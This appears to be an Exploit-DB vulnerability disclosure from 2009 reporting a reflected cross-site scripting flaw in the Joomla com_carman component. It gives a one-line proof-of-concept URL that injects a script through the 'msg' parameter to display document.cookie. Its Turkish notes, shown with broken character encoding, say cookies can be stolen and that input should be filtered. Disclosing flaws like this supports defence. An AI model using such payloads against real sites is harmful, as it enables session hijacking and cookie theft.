Joomla! Component com_carman - Cross-Site Scripting

EDB-ID:

10624

CVE:



Author:

FL0RiX

Type:

webapps


Platform:

PHP

Date:

2009-12-24


< ------------------- header data start ------------------- >

#####################################################################
       Joomla Component com_carman Cross Site Scripting Vulnerability                                          
####################################################################

# author        :Fl0riX
# Greetz          : BARCOD3 , Septemb0x, Deep-Power,DreamPower,Pyske,3kb3r
# Name        : com_carman

# Bug Type       : Cross Site Scripting

# Infection          : Y&#65533;netici ve User cookie&#65533;leri &#65533;al&#65533;nabilir.

# Bug Fix Advice     : Zararl&#65533; karakterler filtrelenmelidir.


#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

/index.php?option=com_carman&msg="><script>alert(document.cookie)</script>

< -- bug code end of -- >